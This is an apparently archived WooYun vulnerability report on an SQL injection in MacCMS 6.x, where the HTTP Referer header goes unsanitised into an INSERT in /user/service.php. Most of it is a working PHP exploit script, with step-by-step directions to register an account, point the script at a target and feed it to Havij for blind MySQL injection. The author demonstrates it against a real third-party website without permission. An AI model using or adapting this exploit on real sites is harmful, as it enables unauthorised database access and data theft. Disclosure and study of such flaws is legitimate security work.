当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038804

漏洞标题:MacCMS 6.x referer处理不当引发注射

相关厂商:MacCMS

漏洞作者: lxj616

提交时间:2013-10-03 14:52

修复时间:2014-01-01 14:53

公开时间:2014-01-01 14:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

MacCMS 9月份新出7.x版本不受影响 因此这个漏洞成为历史漏洞了
不过还是发出来给大家一起讨论学习一下吧

详细说明:

/user/service.php

function Popularize()
{
	global $db;
	$userid = safeData("userid","get");
	if (!isNum($userid)) { die("用户非法,请从新登陆!");}
	$Ip = getip();
	$Ly = $_SERVER["HTTP_REFERER"];
	$row = $db->getRow("select * from tbl_user where u_id=" . $userid .""); 
	
	if ($row){
		$sql="Select * From tbl_user_visit where uv_userid = " .$userid." and uv_ip ='".$Ip."' and STR_TO_DATE(uv_time,'%Y-%m-%d')='".date("Y-m-d")."'";
		$rsUv = $db->query($sql);
		$nums= $db -> num_rows($rsUv);
		if ($nums==0){
			$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");
			$db->query("update tbl_user set u_popularizenum=u_popularizenum+1,u_points=u_points+".app_userpopularize." where u_id = ". $userid );
			$sql="Delete From tbl_user_visit where STR_TO_DATE(uv_time,'%Y-%m-%d')<'".date("Y-m-d")."'";
			$db->query($sql);
		}
	}
	die("<sc" . "ript type=\"text/javascript\">location.href='" .getIndexLink() ."';</sc" . "ript>");
}


$Ly = $_SERVER["HTTP_REFERER"]; 没有处理直接进入SQL INSERT
所以就射了,
下面漏洞证明附PHP exploit

漏洞证明:

alkaid.php
用法:修改最下面的uc_fopen('http://www.391.net/user/service.php?action=popularize&userid=597',0,0,0,FALSE,'',15,true,$_GET["a"]);
为目标网站对应service.php地址格式,然后去注册个合法ID填在userid=597位置上(重要!!!)
然后将alkaid.php?a=1 地址托给Havij用MySQL Blind可以注射

<?php
function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {
$return = '';
$matches = parse_url($url);
!isset($matches['host']) && $matches['host'] = '';
!isset($matches['path']) && $matches['path'] = '';
!isset($matches['query']) && $matches['query'] = '';
!isset($matches['port']) && $matches['port'] = '';
$host = $matches['host'];
$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';
$port = !empty($matches['port']) ? $matches['port'] : 80;
if($post) {
   $out = "POST $path HTTP/1.0\r\n";
   $out .= "Accept: **\r\n";
   //$out .= "Referer: $boardurl\r\n";
   $out .= "Accept-Language: zh-cn\r\n";
   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n";
   $out .= "Cookie: $cookie\r\n\r\n";
}else {
   $out = "GET $path HTTP/1.0\r\n";
   $out .= "Accept: */*\r\n";
   $out .= "Referer: a',(select now()) and ".$inject.")#\r\n";
   $out .= "Accept-Language: zh-cn\r\n";
   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n";
   $out .= "Cookie: $cookie\r\n\r\n";
}
$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
if(!$fp) {
   return '';//note $errstr : $errno \r\n
} else {
   stream_set_blocking($fp, $block);
   stream_set_timeout($fp, $timeout);
   @fwrite($fp, $out);
   $status = stream_get_meta_data($fp);
   if(!$status['timed_out']) {
    while (!feof($fp)) {
     if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {
      break;
     }
    }
    $stop = false;
    while(!feof($fp) && !$stop) {
     $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
     $return .= $data;
     if($limit) {
      $limit -= strlen($data);
      $stop = $limit <= 0;
     }
    }
   }
   @fclose($fp);
   return $return;
}
}
uc_fopen('http://www.391.net/user/service.php?action=popularize&userid=597',0,0,0,FALSE,'',15,true,$_GET["a"]);
echo 'hi';
?>


391.net躺枪了 给我们牺牲自己证明一下吧(官方不自带演示站点的结果)

391.jpg

修复方案:

最新 7.x 版本已经不存在这个问题了

版权声明:转载请注明来源 lxj616@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝